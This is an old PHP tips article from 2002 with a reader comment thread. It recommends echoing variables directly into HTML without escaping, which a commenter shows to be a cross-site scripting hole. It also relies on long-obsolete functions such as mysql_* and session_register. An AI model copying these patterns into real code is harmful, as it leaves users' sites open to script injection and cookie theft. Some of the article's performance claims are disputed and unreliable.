PHP Guidelines

Posted on May 12, 2002

in Code

by Jester uk (jesteruk)

Rated 4.4 (Ratings: 26) (Add your rating)

Want more?

More articles in Code
More articles by jesteruk

Jester uk

Member info | Full bio

User since: December 22, 2001

Last login: December 22, 2001

Articles written: 6

I see a lot of very badly written PHP code around, most of which I have been guilty for myself, so I thought I'd write a tutorial to help people get the most out of PHP -- and maybe not make the mistakes I did.

" And ' Are Very Different

I see a lot of this:

$name = "Bill";

That isn't efficient; the whole point of double quotes is to allow interpolation. Meaning, PHP checks anything within double quotes for a variable. Like so:

echo "My name is $name";

If you do:

$name = "Bill";

Then PHP checks the contents of the double quotes for a variable to interpolate. This makes your scripts SLOWER, in small scripts this isn't noticeable, it isn't a big difference, but in large, complex scripts this extra work for PHP can be very noticeable. Get into the habit of doing:

$name = 'Bill';

"Hey, PHP, I'm not using double quotes, I'm using single quotes here, don't even bother checking for something to interpolate."

This reduces the work PHP has to do to parse your script, increasing efficiency, especially in larger scripts. Get into the habit — use quotes correctly.

These rules apply to everything, echo, functions, strings, everything.

SetCookie('name', 'Bill');

Not:

SetCookie("name", "Bill");

Another thing you can do is use single quotes even when using a variable, like so:

$name = 'Bill';<br>

echo 'My name is '.$name;

Apparently, PHP scripts parse faster this way. One other advantage of this is:

echo "<a href=\"http://www.evolt.org\">Evolt</a>";

Look familiar? Use single quotes and you don't have to escape double quotes.

echo '<a href="http://www.evolt.org">Evolt</a>';

Works fine, and saves you having to escape those annoying quotes.

Get used to it, I wish I'd have been told that when I started with PHP.

Jump from PHP Mode

I also see a lot of this:

&lt;?php<br>

$name = 'Bill';<br>

echo "&lt;table align=\"center\"&gt;&lt;tr&gt;&lt;td&gt;My name is $name&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;";<br>

?&gt;

No, don't do that. One of the great features of PHP is its ability to jump in and out of PHP mode. It has actually been shown that jumping from PHP mode when outputting data actually increases your script's parse speed, so your script will be faster. Do this:

&lt;?php<br>

$name = 'Bill';<br>

?&gt;<br>

&lt;table align="center"&gt;&lt;tr&gt;&lt;td&gt;My name is &lt;?=$name?&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;

Leave "PHP Mode" and print out the content, if you need to use more PHP code, just jump back in!

It's easy to do, it makes content easier to output, and it speeds up your scripts.

<?=$name?>

This is a short-hand in PHP for:

<?php echo $name; ?></p>

Jump into PHP Mode, echo out the data contained in the variable then jump back out of PHP mode. Use it, it makes scripts easier to read, easier to edit, it's just a lot easier and efficient.

register_globals Off

Another mistake I see around a lot is people writing scripts that will not work if register_globals is off. In the next release of PHP register_globals will be off by default, so you need to start writing your scripts with this in mind.

Having register_globals off is no big deal. I mean how hard is it to write:

$_POST['username']</p>

Rather than:

$username</p>

Not very. It's also a lot more secure, as it stops users being able to pass variables to your script through the query string and the like. If they stuck:

?name=Jester</p>

Into their address bar, "Jester" would not be available in $name. It would be available in $_GET['name'] or $HTTP_GET_VARS['name']. So they can't pass variables that could twist the behaviour of your scripts.

Note: If you have register_globals off, ensure you have track_vars on. Track_vars makes all environment variables available in the arrays: $HTTP_SERVER_VARS ($_SERVER also, for newer versions of PHP), $HTTP_COOKIE_VARS, $HTTP_POST_VARS ($_POST also) and $HTTP_GET_VARS {$_GET also). Using these arrays instead of the normal variables isn't much extra work for more security.

Sessions in PHP also perform a lot better with register_globals off. Take a look at a snippet of code.

$username = $_POST['uname'];

session_register('username');

To register a session variable many people use this method (I have in the past), you don't need to, if you have register_globals off you can merely do:

$_SESSION['username'] = $_POST['uname'];

You see, in the first part code PHP needs to know that the variable is being registered as a session variable. In the second we are using the $_SESSION array, PHP knows if we store something in this it is a session variable, we don't need to "register" it, and the variable will now be available to you -- without you having to pass it through the query string and form inputs -- until you destroy it; like so:

unset($_SESSION['username']);

With MySQL

Another mistake a lot of people make is when they extract data from a database. For anyone familiar with PHP and MySQL, you will be familiar with the following function:

mysql_fetch_array()

"mysql_fetch_array() is an extended version of mysql_fetch_row(). In addition to storing the data in the numeric indices of the result array, it also stores the data in associative indices, using the field names as keys."

The above is taken from the function description on php.net. So it's saying, when we use mysql_fetch_array() we are fetching two arrays: one containing indices, and one containing associative references to the field names in your database. Why? If you want indices, you will use mysql_fetch_row(), right? We use mysql_fetch_array() when we want the associative references. It's a lot easier when using associative references, yet we have this spare array taking up space and diminishing the efficiency of our code. Luckily those nice people at PHP have an array that fetches an associative array, and only that:

mysql_fetch_assoc()

mysql_fetch_assoc() fetches an associative array. If you want only that, use this function, if you want indices, use mysql_fetch_row(). If for some reason you need both, then you should use mysql_fetch_array(). Don't assign variables you won't use.

References

PHP is going places, it's a great language, in my opinion second-to-none when it comes to dynamic webpages. Let's use it to its full potential.

-Jester

I just like messing around with web design stuff, just a hobby.

Particularly perl, PHP and SQL.

http://www.free2code.net/

34 comments on this article. Log in to add your comment | Rate this article:

great article

Submitted by Martin Tsachev on May 13, 2002 - 15:22.

It's a great article particularly the register_globals = off that's something more people should get used to.

I wouldn't put <?=$name?> in an article like this though because short tags aren't portable. And I would also recommend the mysql_fetch_object function - it is easier if you need to output many variables and you opt for variables interpolation after all. You don't need to change anything when your variable is included in a string vs remove the quotes from the array index.

Good point

Submitted by jesteruk on May 13, 2002 - 19:04.

That's true Shaggy, the <?=$var?> shortcut won't work if you don't have short tags enabled, I'm so used to typing it though, I don't use XML so have no need to disable short tags, unless I'm writing something I need to be portable.

Interesting...

Submitted by Corsair on May 14, 2002 - 03:00.

I never had the fact that single and double quotes meant different things. Or maybe I just skimmed that chapter...Being a Computer Science major I just try and get the rundown on how stuff is done instead of having to read all the details. But here's a good reason why it's a smart idea to read between the lines. Good stuff that needed to be pointed out.

The other thing that I want to point out is this: USE BRACKETS! AND PROPERLY EVEN!.

I see a lot of code, and even in the books I've read that I tried to learn the language from, that used the "as long as I only have one line of code after the statement I won't use brackets"-rule. This is extremely bad coding practices...that, and the indention, and commenting. If everyone would do that it'd make for better code, for yourself and others.

Yes

Submitted by jesteruk on May 14, 2002 - 03:59.

Very good points Corsair, you mean like this?

if($blah) $blah = 'yes';<br>

else $blah = 'no';

I have never and will never use that, is it so hard to type two brackets? I read somewhere the standard indent for coding is supposed to be "four spaces", but I disagree, why use four spaces when a tab makes a more apparent indent, and only uses one char? Using four spaces, eight for two indents, and so on, makes more complicated scripts significantly larger.

On the double quotes VS apostrophes, in theory double quotes take longer to process, as PHP has to evaluate the contents, with single quotes it doesn't. I have tested this a few different ways and single quotes are infact a little faster, from my experiments. I wrote a little script that assigned 10K values to an array $var['x'] and contained the string i was assigning to it in double quotes, then in single quotes. The single quotes had a little on the double quotes, but even at 10K assignments it was only fractions of a second. It's nice to get rid of those fractions of a second though :)

Also

Submitted by luminosity on May 14, 2002 - 05:28.

Also, $_COOKIES is an array for cookie values, something you didn't mention. The great thing about these arrays is that since they're all global you don't have to worry about function scope at all.

a couple of extra tips

Submitted by skunk on May 14, 2002 - 10:59.

If you're really keen on efficiency try comparing these two lines of code:

echo 'Hello '.$name.', how are you doing?';
echo 'Hello ', $name, ', how are you doing?';

The second one should be faster. Why? Because in the first line the . operator is used to concatenate strings. This forces PHP to create a new string in memory to hold the newly created longer string, then send that new string to the output buffer. The second line uses commas instead - a little known feature of the echo statement (and one that differentiates it from print) is that you can give echo a comma seperated list of values and it will output them one by one. The second line therefore avoids the overhead of creating a new concatenated string in memory.

A related tip on string concatenation is that PHP supports heredoc syntax (borrowed from perl). The following code demonstrates this:

$string =

Deeper thinking

Submitted by tupholme on May 15, 2002 - 08:00.

Good points. I knew about the differences between quotation marks, but had never thought of the performance implications. PHP/Zend has so many ways of doing things it is easy to think that they are all equivalent. What about mentioning the difference between = and =& when creating objects? That is also non-obvious and makes the difference between keeping two copies of an object in memory and only one. (Or see the PHP manual!)

some thoughts

Submitted by Martin Tsachev on May 15, 2002 - 13:36.

Jester: Although I try to avoid the no-bracket ifs sometimes the code is clearer if you use them. Imagine 5 or 6 ifs running, of course if I use the else clause I would put brackets.

I read somewhere the standard indent for coding is supposed to be "four spaces", but I disagree, why use four spaces when a tab makes a more apparent indent, and only uses one char? Using four spaces, eight for two indents, and so on, makes more complicated scripts significantly larger.

There's a good reason for that and it is that using spaces is more portable than using tabs, the tabs aren't always displayed with the same size. The classic tab is equal to 8 characters and the modern one to 4 only, that makes a great difference. On the code size issue you really shouldn't worry about that - hard disks are so cheap these days and the PHP engine doesn't evaluate spaces so generally you can't expect a performance hit.

luminosity: Yes $_COOKIES is a global one but unfortunately it is available only from PHP 4.1 on, the old $HTTP_COOKIE_VARS wasn't a global. Anyway with recent security advisories most hosting services should have at least PHP 4.1.2.

skunk: Haven't you heard that < has to be escaped in HTML code, or you just thought that because it is displayed in a textarea you can save yourself the effort. The same comments though are displayed in a pre element when you choose 'Print article'.

  
  login or register to post comments






Yes
  Submitted by jesteruk on May 15, 2002 - 14:24.
     Shaggy: I am aware tabs aren't portable, and differ in size from user to user, but my point is: A tab, whether it be 4 or 8 spaces, is always significant enough an indent to allow good coding structure. I'm aware hard drives are cheap, and PHP doesn't evaluate spaces, but bandwidth isn't cheap :) Why have a MB of spaces in a large project when you can reduce that four-fold? We should try to keep script as small as possible, using excess space is illogical.
I don't agree on the if() brackets, but that is your choice man.
-J  
  login or register to post comments





Spaces mean nothing, readability means everything
  Submitted by eli on May 15, 2002 - 14:43.
     I just created a file with 1000 lines of code, copied that and added 1000 spaces, copied that and added 1000 tabs. 

The file started at 25k

The file with 1000 spaces was still 25k

The file with 1000 spaces and 1000 tabs was still......25k


PHP ignores whitespace and adding whitespace to a file does not appear to make it larger, so what matters here is coding style. The reason old-schoolers use spaces is because of a.) that is how they were taught and, 2.) there were some limitations on equipment that made using space(s) much easier. All that and tabs may be different from machine to machine.

The bottom line is that code must be readable, commented, and documented. If you write a peice of code today and do not do any of that, will you be able to maintain your code easily?  
  login or register to post comments





about tabs
  Submitted by Martin Tsachev on May 15, 2002 - 14:48.
     My point was that a user who views tabs as 4 characters may not realize that somebody else viewing the code with tabsize of 8 characters will have to scroll a lot. Anyway I use tabs and only convert them to spaces sometimes for display in articles. For minimization of scrollbars I've even sometimes converted them to 3 spaces.


Jester I didn't say I always use non-bracketed ifs but that I sometimes use them when there's no else clause and when there is a group of consequtive if's. I don't know what can be wrong with that, it's just more compact and readable.
  
  login or register to post comments





okay then...
  Submitted by jesteruk on May 15, 2002 - 15:51.
      "just created a file with 1000 lines of code, copied that and added 1000 spaces, copied that and added 1000 tabs. 
The file with 1000 spaces was still 25k

The file with 1000 spaces and 1000 tabs was still......25k"
Really? So you are saying if you create a text file, hit the space bar 100 times and then save it, the file will be zero bytes? Interesting.
I'm aware that editors handle tabs inconsistently, and all editors handle spaces correctly, but for indents I'm sure it will have the desired effect, whatever editor or tab size one is using.
My point is simply: one tab takes up one byte, four spaces takes up four bytes.
We are all different ;) I prefer to use tabs, but... whatever floats your boat.  
  login or register to post comments





MySQL assisiative Array !
  Submitted by cbird on May 16, 2002 - 04:12.
     I would just say  that the optimizing the code is always there !
all we need to do is the design the application before we start coding, and yes the MySQL array tip was really memory refreshing !  
  login or register to post comments





inefficient
  Submitted by a_baked_potato on May 16, 2002 - 18:19.
     Optimizing code is all very good and well, but the performance difference between interpolated and static strings on modern hardware is minute.  As is the performance difference between concatenating and then printing and giving echo multiple paramaters.  If you spend your own time doing this kind of stuff that's all fine and well.  If you're spending your employer's time doing it then you are acting in an unprofessional manner.

The real gain (if any) comes from improved code readability, which should lead to easier maintenance.  Significant performance improvements (the kind your boss wants you to spend the time he's paying you for to acheive, the kind that will actually make a difference) come almost exclusively from design level work.  The classic computer science example is replacing bubble sort O(n^2) with merge or quick sorts O(n log n).

The tip about turning off register variables is excellent.  This is exactly the sort of thing that promotes good design.  Global variables are dangerous as they tend to tempt people into writing sloppy and poorly designed code.

The tip about switching in and out of php mode is suitable for small or trivial projects where performance isn't probably an issue anyway.  Any serious php developer will tell you that a php page starts with <?php and ends with ?>.  But then serious web developers tend to prefer more effective tools (zope for instance).

P.S.  Anyone who deploys MySQL professionally should be shot.  If you need a database then use a database, not a filesystem dressed up as a database.  Acceptable alternatives abound.  
  
login or register to post comments





Indeed
  Submitted by jesteruk on May 16, 2002 - 19:46.
     Thanks for the comments on register_globals, as for the rest, they're your opinions man :) Thanks for commenting.
-J  
  login or register to post comments





in and out of PHP mode
  Submitted by Martin Tsachev on May 17, 2002 - 08:24.
     Switching in and out of PHP mode gives you the most benefits in terms of readability. If you have used Zope than you won't even notice any performance hit this may cause.


Yes, go and shoot Yahoo!. If performance is on your mind why should you slow down the slowest part of the system by using another database?
  
  login or register to post comments





Security
  Submitted by Xanadu on May 17, 2002 - 09:24.
     AFAIK, 

<?php
 ..
?>

 is more secure than . I'm sure I read that we are encouraged to use the former always.

Superb tip about not needing to escape double quotes in echoed HTML!  
  login or register to post comments





Security
  Submitted by Xanadu on May 17, 2002 - 09:25.
     AFAIK, php at the start of your code is more secure than just a question mark. I'm sure I read that we are encouraged to use that always.

Superb tip about not needing to escape double quotes in echoed HTML!  
  login or register to post comments





Yes Shaggy.
  Submitted by jesteruk on May 17, 2002 - 10:35.
     MySQL is the most popular open-source database around, I think what a_baked_potato was trying to say was that he doesn't like it personally. He just came across as obnoxious, but some people do.
We must respect other people's opinions, if he doesn't like it; that is okay. Though he should respect those who do and try to refrain from blowing them away :) I detest fish, but I don't expect everyone else to.
-J  
  login or register to post comments





he doesn't like it personally?
  Submitted by Martin Tsachev on May 17, 2002 - 12:58.
     I'm not quite sure if I don't like an app personally I won't shoot and won't promote shooting people who use it, especially if Yahoo! are amongst the users of  the app. We all know which is the most popular web site right?


Xanadu using &lt;?php is surely more portable and is the only choice if you use mix PHP with XML. Besides not all users are bound to setting short_open_tags.
  
  login or register to post comments





he doesn't like it personally?
  Submitted by Martin Tsachev on May 17, 2002 - 12:58.
     I'm not quite sure if I don't like an app personally I won't shoot and won't promote shooting people who use it, especially if Yahoo! are amongst the users of  the app. We all know which is the most popular web site right?


Xanadu using &lt;?php is surely more portable and is the only choice if you use mix PHP with XML. Besides not all users are bound to setting short_open_tags.
  
  login or register to post comments





True
  Submitted by jesteruk on May 18, 2002 - 08:06.
     Using <?php is just for portability, not everyone has short_open_tags on. If you are writing a script just for your site though, portability isn't an issue, you know your server config, your database, you can write specifically for those. It's if you're writing code other people will see, then you have to do it right. Also, one day you could have to move your scripts to a different server, or you may want to change the database you use, with that in mind it is always better to write portable code.
I agree shaggy, MySQL is a nice database, even if it is a "file system dressed up as a database". I like it, I understand others don't though.  
  login or register to post comments





Another escaping problem
  Submitted by bobince on May 18, 2002 - 10:11.
     Do this:
My name is &lt;?=$name?&gt;
No, don't do that. How do you know there isn't a '<' (or '&') character in $name? You've just made a cross-site-scripting security hole.
There is htmlspecialchars(). Use it every time you take plain-text content and move it into an HTML document. Or you'll get in trouble.
Anyone who deploys MySQL professionally should be shot.
Enough of this hoary old myth. Not every project needs transactions and foreign key constraints, in fact the majority of web projects don't. In any case, newer versions of MySQL are indeed growing them.
For some applications, MySQL does offer considerably more performance than the free alternatives. For other applications you may want the additional features provided by other databases. Both have their place; to argue MySQL has no place at all is silly.
Especially for people on Windows servers, for whom PostgreSQL is not an option.  
  login or register to post comments





1000 character 25k post
  Submitted by mgkimsal on May 18, 2002 - 12:56.
     The point wouldn't be to put 1000 spaces in one file and 1000 tabs in another.  Put 4000 spaces in one file and 1000 tabs in another.  Or 8000 spaces in the first file - that's the difference.  If you're really concerned about offending someone else who might open your code file at some point, run a short program to replace the tabs with 4 or 8 spaces.  Personally I hate having the editor say 'tab=4 spaces' because when I delete, it deletes one at a time, not 4 at a time (or 1 tab, which is what I want in the first place).  
  login or register to post comments





hmmmmmm
  Submitted by jesteruk on May 18, 2002 - 20:40.
     bobince explain: "No, don't do that. How do you know there isn't a '<' (or '&') character in $name? You've just made a cross-site-scripting security hole."
A cross-site-scripting security hole? I can see how a & or < could cause a validation error in the resulting document, but how does it form a security hole? Elaborate, I see no security risk, tell me if I'm missing something.  
  login or register to post comments





XSS
  Submitted by bobince on May 19, 2002 - 11:44.
     juk: if you can insert a '<', you can insert a '<script>', or any of the other ways of injecting JavaScript code into an HTML document.
If a user can submit a $name that others will see, they can execute code on other people's browsers in the security context of your page, which means they can do things like steal cookies, or defeat whatever other guards you have used against XSS.
For example, if your site requires a dynamically-generated 'form ID' to submit a form, which would normally prevent people crafting a malicious action that would make a user automatically take an action on your site, an injected script could, for example, load a page into an iframe, read the ID and submit it.  
  login or register to post comments





Ah
  Submitted by jesteruk on May 20, 2002 - 14:24.
     I see, well I always use regex to strip HTML out of variables, but it is a good point you make.  
  login or register to post comments





why regex?
  Submitted by Martin Tsachev on May 21, 2002 - 12:43.
     Why use regular expressions when we PHP users have the strip_tags function or if you want to show angles and amprsands use the htmlspecialchars.
  
  login or register to post comments





because
  Submitted by jesteruk on May 24, 2002 - 17:16.
     sometimes i want certain tags to be allowed. so i just filter out anyting that isn't one of those tags. I only see regex as a way to do this.  
  login or register to post comments





strip_tags
  Submitted by Martin Tsachev on May 31, 2002 - 06:08.
     strip_tags can do that too, although I'm not sure if it checks attributes.
  
  login or register to post comments





No...
  Submitted by jesteruk on June 1, 2002 - 13:04.
     I don't think it does shaggy, you can specify tags you don't want to strip out, but not attributes. I have always used regex for that, I doubt there's a huge performance differene between the two.  
  login or register to post comments





hm
  Submitted by Martin Tsachev on June 2, 2002 - 14:35.
     Actually when I think about it now, I would do the same thing if I wanted to be 100% sure what will go through. Anyway if it's just to strip all tags the PHP function is much clearer than a regex.
  
  login or register to post comments





variable content
  Submitted by shotgun on September 13, 2002 - 08:31.
     I find very convenient to sporadically use print_r() to view variable content in different parts of my code.  However, I sometimes forgot to precede it with print '<pre>' and afterwards with print '</pre>' so that indentation that print_r introduces displays correctly on the browsers.  I created the function print_var() to handle such needs: 
function print_vars($var){
	print '<pre>';
	print_r($var);
	print '</pre>';
	return;
}

With this, you only need to specify print_vars($variable) to view the contents of $variable  
  login or register to post comments





spaces vs tabs episode 2000
  Submitted by bruco80 on March 20, 2006 - 14:16.
     I prefer spaces, ok, but I think that 4 are too much!! It is very unconfortable having very long lines, try it! with a if-block inside a loop you start coding in the mittle of the screeen!<p><p>
PS<p>

the best are 2 ;-)
  
  login or register to post comments

Start of page header

Submit

Article Categories

Highest rated articles

Recent comments